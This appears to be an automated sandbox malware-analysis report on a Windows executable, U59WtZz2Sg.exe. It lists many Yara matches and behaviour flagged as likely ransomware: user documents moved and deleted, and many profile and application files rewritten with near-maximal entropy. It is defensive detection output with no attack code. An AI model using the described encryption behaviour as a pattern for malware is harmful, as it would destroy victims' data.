Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File moved: C:\Users\user\Desktop\BPMLNOBVSB.jpg Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File deleted: C:\Users\user\Desktop\BPMLNOBVSB.jpg Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File moved: C:\Users\user\Desktop\WUTJSCBCFX\WUTJSCBCFX.docx Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File deleted: C:\Users\user\Desktop\WUTJSCBCFX\WUTJSCBCFX.docx Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File moved: C:\Users\user\Desktop\KZWFNRXYKI\QNCYCDFIJJ.mp3 Jump to behavior
Writes many files with high entropy
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 entropy: 7.99718399296 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 entropy: 7.99869096623 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 entropy: 7.99861836034 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620838562510.txt entropy: 7.99842047333 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\plugins.qmltypes entropy: 7.9976440774 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620921860467.txt entropy: 7.9983292679 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701119838854.txt entropy: 7.99818298483 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701138403912.txt entropy: 7.99822942189 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701505080737.txt entropy: 7.99843483481 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\flapper.gif entropy: 7.99709477717 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Extras\plugins.qmltypes entropy: 7.99393413696 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Templates.2\plugins.qmltypes entropy: 7.99754052711 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt entropy: 7.99584745995 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt entropy: 7.99855840227 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt entropy: 7.99463027142 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt entropy: 7.99489474793 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99188039174 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt entropy: 7.99835419598 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt entropy: 7.99865927987 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt entropy: 7.996764672 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt entropy: 7.99817114966 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt entropy: 7.99155169116 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt entropy: 7.99862793305 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt entropy: 7.99564862987 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt entropy: 7.99365886765 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\{5BAAF43C-032B-11EB-90E4-ECF4BB570DC9}.dat entropy: 7.9912230943 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt entropy: 7.99662861073 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui entropy: 7.99409784357 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt entropy: 7.99636084684 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt entropy: 7.99443921081 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt entropy: 7.99121582669 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js entropy: 7.99751740013 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui entropy: 7.9923616287 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\de\OneDrive.adml entropy: 7.99556620242 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\es\OneDrive.adml entropy: 7.99597410146 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\fr\OneDrive.adml entropy: 7.99599838665 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\hu\OneDrive.adml entropy: 7.99603839271 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\it\OneDrive.adml entropy: 7.99575239825 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ja\OneDrive.adml entropy: 7.99595138657 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ko\OneDrive.adml entropy: 7.99574027367 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\nl\OneDrive.adml entropy: 7.9952345599 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.99746001356 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pl\OneDrive.adml entropy: 7.99597646639 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-BR\OneDrive.adml entropy: 7.99602810998 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-PT\OneDrive.adml entropy: 7.9950605594 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ru\OneDrive.adml entropy: 7.99692983487 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99871963214 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\sv\OneDrive.adml entropy: 7.99524754113 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\tr\OneDrive.adml entropy: 7.99606012022 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-CN\OneDrive.adml entropy: 7.99481256171 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-TW\OneDrive.adml entropy: 7.99425827432 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\acm_low_disk_space_online_only.svg entropy: 7.99630390885 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat entropy: 7.99055795118 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml entropy: 7.99471432634 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui entropy: 7.99881519691 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin entropy: 7.99442966622 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\finderExtensionPrompt.svg entropy: 7.99584080057 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui entropy: 7.9958653689 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui entropy: 7.99649881628 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui entropy: 7.99856775073 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt entropy: 7.99590032893 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui entropy: 7.99851888267 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui entropy: 7.99852776609 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui entropy: 7.99383215582 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99840183987 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db entropy: 7.99843170661 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db entropy: 7.99821329563 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db entropy: 7.99831618931 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99833774153 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GA0XG3F1\www.bing[1].xml entropy: 7.99875962587 Jump to dropped file
